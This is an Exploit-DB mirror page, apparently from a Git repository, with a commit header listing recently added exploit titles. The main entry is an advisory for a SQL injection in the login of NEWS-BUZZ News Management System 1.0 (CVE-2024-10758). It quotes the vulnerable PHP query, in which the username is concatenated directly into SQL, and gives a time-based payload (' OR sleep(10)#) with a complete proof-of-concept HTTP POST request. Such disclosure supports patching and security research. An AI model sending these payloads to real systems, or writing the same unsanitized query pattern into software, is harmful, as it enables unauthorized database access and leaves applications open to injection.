bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/52174.txt
Exploit-DB 60175c9963 DB: 2025-04-14 
52 changes to exploits/shellcodes/ghdb

Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection
Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection
Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS)
Microchip TimeProvider 4100 Grandmaster (Data plot modules) 2.4.6 - SQL Injection

Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)

DataEase 2.4.0 - Database Configuration Information Exposure

Cosy+ firmware 21.2s7 - Command Injection

Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE)

K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
ABB Cylon Aspect 3.07.02 - File Disclosure (Authenticated)
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)
ABB Cylon Aspect 3.07.02 - File Disclosure
ABB Cylon Aspect 3.08.01 - Remote Code Execution (RCE)

Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover

CyberPanel 2.3.6 - Remote Code Execution (RCE)

IBM Security Verify Access 10.0.0 - Open Redirect during OAuth Flow

Intelight X-1L Traffic controller Maxtime 1.9.6 - Remote Code Execution (RCE)

KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR)

MagnusSolution magnusbilling 7.3.0 - Command Injection

Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover

Progress Telerik Report Server 2024 Q1 (10.0.24.305) - Authentication Bypass

Sonatype Nexus Repository 3.53.0-01 - Path Traversal

Watcharr 1.43.0 - Remote Code Execution (RCE)

Webmin Usermin 2.100 - Username Enumeration
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete
ABB Cylon Aspect 3.07.01 - Hard-coded Default Credentials
ABB Cylon Aspect 3.08.01 - Arbitrary File Delete

AquilaCMS 1.409.20 - Remote Command Execution (RCE)

Artica Proxy 4.50 - Remote Code Execution (RCE)

Centron 19.04 - Remote Code Execution (RCE)

ChurchCRM 5.9.1 - SQL Injection

CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS)

CodeCanyon RISE CRM 3.7.0 - SQL Injection

Elaine's Realtime CRM Automation 6.18.17 - Reflected XSS

Feng Office 3.11.1.2 - SQL Injection
flatCore 1.5 - Cross Site Request Forgery (CSRF)
flatCore 1.5.5 - Arbitrary File Upload
flatCore 1.5 - Cross Site Request Forgery (CSRF)
flatCore 1.5.5 - Arbitrary File Upload

GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

Gnuboard5 5.3.2.8 - SQL Injection

LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection

Litespeed Cache 6.5.0.1 - Authentication Bypass

MiniCMS 1.1 - Cross Site Scripting (XSS)

MoziloCMS 3.0 - Remote Code Execution (RCE)

NEWS-BUZZ News Management System 1.0 - SQL Injection

PandoraFMS 7.0NG.772 - SQL Injection

phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)

PZ Frontend Manager WordPress Plugin 1.0.5 - Cross Site Request Forgery (CSRF)

ResidenceCMS 2.10.1 - Stored Cross-Site Scripting (XSS)

RosarioSIS 7.6 - SQL Injection

Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)
Typecho 1.3.0 - Race Condition
Typecho 1.3.0 - Stored Cross-Site Scripting (XSS)

X2CRM 8.5 - Stored Cross-Site Scripting (XSS)

Rejetto HTTP File Server 2.3m - Remote Code Execution (RCE)

Microsoft Office 2019 MSO Build 1808 - NTLMv2 Hash Disclosure
2025-04-14 00:16:26 +00:00

61 lines
No EOL
2 KiB
Text
Raw Permalink Blame History

# Exploit Title: NEWS-BUZZ News Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: egsec
# Date: 2024-11-03
# Vendor Homepage: https://code-projects.org
# Software Link: https://code-projects.org/content-management-system-in-php-with-source-code-2/
# Version: 1.0
# Tested on: Windows 11 Pro
# Impact: The manipulation of the argument user_name with an unknown input leads to a sql injection vulnerability
# CVE : CVE-2024-10758
## Vulnerability Description:
There is a SQL injection vulnerability in the login part of the index.php file. It allows an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.
## Vulnerable code section:
In the source code, you can find vulnerable code in the NEWS-BUZZ/login.php file:
<?php
...
$query = "SELECT * FROM users WHERE username = '$username'";
$result = mysqli_query($conn, $query) or die(mysqli_error($conn));
...
?>
In this line, the $username variable is directly embedded into the SQL query without proper handling. This allows an attacker to inject malicious SQL code.
## Proof of Concept (PoC):
1.Location: http://localhost/NEWS-BUZZ/index.php
2.Time-Based SQL Injection Payload: ' OR sleep(10)#
3.PoC request:
POST /NEWS-BUZZ/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://localhost
Connection: close
Referer: http://localhost/NEWS-BUZZ/index.php
Cookie: PHPSESSID=456n0gcbd6d09ecem39lrh3nu9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
user_name=admin%27+or+sleep%2810%29%23&user_password=adminpass&login=
4.PoC response:
The response will come called time by using sleep() function.
Reference in a new issue View git blame Copy permalink